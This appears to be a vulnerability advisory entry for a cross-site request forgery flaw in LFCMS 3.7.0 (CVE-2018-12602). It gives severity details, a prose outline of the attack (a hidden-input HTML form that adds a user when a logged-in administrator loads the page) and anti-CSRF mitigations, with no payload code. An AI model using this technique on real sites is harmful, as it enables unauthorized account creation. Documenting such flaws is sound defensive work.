Vendor: LFCMS
By: bay0net
CVSS: 8.8 (HIGH)
CWE: CWE-352 Cross-Site Request Forgery (CSRF)
Product Name: LFCMS
Affected Version From: 3.7.0
Affected Version To: 3.7.0
Patch Exists: YES
Related CVE: CVE-2018-12602
CPE: a:lfdycms:lfcms:3.7.0
Metasploit: N/A
Platforms Tested: None
Year: 2018
Description:
A CSRF vulnerability exists in LFCMS_3.7.0: users can be added arbitrarily.
A CSRF vulnerability exists in LFCMS_3.7.0 that allows users to be added arbitrarily. The attack payload is an HTML form with hidden inputs containing the username, email, password, and repassword of the user to be added; a logged-in administrator who loads the attacker's page submits the form with their own session cookie.
Mitigation:
Implementing CSRF protection mechanisms such as per-session anti-CSRF tokens validated server-side on the user-add request, the SameSite cookie attribute, and CAPTCHAs can help mitigate the risk of CSRF attacks.